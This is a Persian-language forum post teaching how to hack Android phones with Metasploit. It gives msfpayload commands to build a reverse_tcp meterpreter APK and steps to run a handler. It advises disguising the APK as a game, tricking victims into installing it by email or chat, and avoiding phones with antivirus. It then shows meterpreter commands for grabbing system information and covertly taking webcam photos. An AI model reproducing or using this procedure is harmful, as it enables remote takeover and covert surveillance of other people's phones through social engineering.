رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام خدمت دوستان عزیز گارد ایران،خوب امروز براتون آموزش هک گوشی اندروید از طریق متا اسپلویت رو آماده کردم.فقط قبل از آموزش یک نکته رو بگم.من از آموزش تصاویری رو تهیه کردم که به صورت لینک در متن قرار دادم.امیدوارم از آموزش لذت ببرین.با تشکر.خوب بریم سراغ آموزش.

این آموزش روی۷۰٪گوشیها و تبلت ها جواب داده.

--------------------------------------------ابزار:

۱-متاسپلویت در کالی لینوکس ورژن ۱.۰.۶۲

2-یک هدف(یک گوشی یا دستگاه اندروید که از ۲ به بالا باشد(خود ۲

هم قابل هک است)

۳-یک عدد اینترنت پر سرعت(!)

-------------------------------------------

قابل توجه هست که من روی ۳ گوشی امتحان کردم:

۱-HTC One2-

Samsung Galaxy s53-

SONY Xperia Z 1

و روی ۲ تاش جواب داد!!!!یکی سامسونگ و دیگری اچ تی سی و گوشی

سونی به دلایلی (!)نشد

توجه:گوشی یا نباید آنتی ویروس داشته باشه یا اگر داره باید

خاموش یا آپدیت قدیم باشه .در ضمن من هم بر روی گوشیهای فوق

بدون آنتی ویروس امتحان کردم که جواب داد.شما سعی کنید با

مهندسی اجتماعی سرش رو گول بمالید مثلا بگید قندشکن جدیده که

فلان هست و ...

------------------------------------------

اموزش:

۱-ترمینال را باز می کنیم.

۲-متاسپلویت رو اینطور تنظیم می کنیم(payload ,

framework)

کد:

msfpayload android/meterpreter/reverse_tcp LHOST=

LPORT=۳-

در این اموزش آی پی هکر ۱۹۲.۱۶۸.۸.۹۴ هست. و ما هم برای حمله و

ساخت فایل apkاز این دستور استفاده می کنیمنام فایل hack.apkهست

شما اینقدر زایه نزارید مثلا بزارید SubwaySurferz.apk)

http://d289vtzrietndv.cloudfront.net...roid_hack1.jpg

​۴-چون payload ما reverse_tcpهست؛ما مجبوریم یه هندلر بسازیم

تا بتونیم از سیستم گوشی بک کانکت بگیریم.(از همون پورت بالا

استفاده می کنیم تا ارتباطات رو کنترل کنیم) در ترمینال تایپ

کنید»»

کد:

root@kali~msfconsole

تا کنسول متاسپلویت باز شه. سپس به شکل زیر وارد عمل شید:

http://d289vtzrietndv.cloudfront.net...roid_hack2.jpg

خب چیزایی که خط قرمز دارن رو توضیح میدم: اولین:ما میخایم از

هندلر متاسپلویت برای حمله استفاده کنید. دومین:اطمینان از

اینکه این payloadهمان پیلود قبلی هست.۵-حالا باید سوییچ

پیلودمان در متاسپلویت را تنظیم کنیم(به شکل زیر):

http://d289vtzrietndv.cloudfront.net...roid_hack3.jpg

دستورات رو یکی یکی توضیح بدم: ۱-تنظیم آی پی دستگاه هکر

۲-پورتی که باید listenبشه رو تنظیم کردیم(تو اتصال reverse_tcp

connection) ۳-آغاز حمله!!!!!!!!!!!!!! حالا شما یک فایل apk در

اختیارتون هست مثل یک تروجان عمل می کنه.اون رو به قربانی بدید

مثلا از طریق ایمیل یا چت یا ....حالا قربانی فایل رو دان می

کنه و به ما اجازه می ده بهش دسترسی پیدا کنیم.(نکته:فایل باید

حتما نصب بشه وگرنه بصورت عادی ب هیچ دردی نمیخوره)پس از نصب

فایل و اینکه قربانی وارد اپ شد(اپ درغین ما)کنسول این

شکلیه»

http://d289vtzrietndv.cloudfront.net...roid_hack4.jpg

آخرین مرحله: حالا گوشی هک شده و در اختیار شماست.مثلا می تونید

بنویسید: sysinfo این شکلی میشه:

http://d289vtzrietndv.cloudfront.net...roid_hack5.jpg

یا مثلا وبکم رو هک کنید:کد:

meterpreter>webcam_list

1: Back Camera meterpreter>webcam_snap 2

2:Front Camera [ ]GOt frame!

Starting...

​STopped Webcam shot saved to:

/root/Desktopmeterpreter> 

امیدوارم از آموزش بهره کافی رو برده باشین.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

مهمان
این موضوع برای عدم ارسال قفل گردیده است.

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...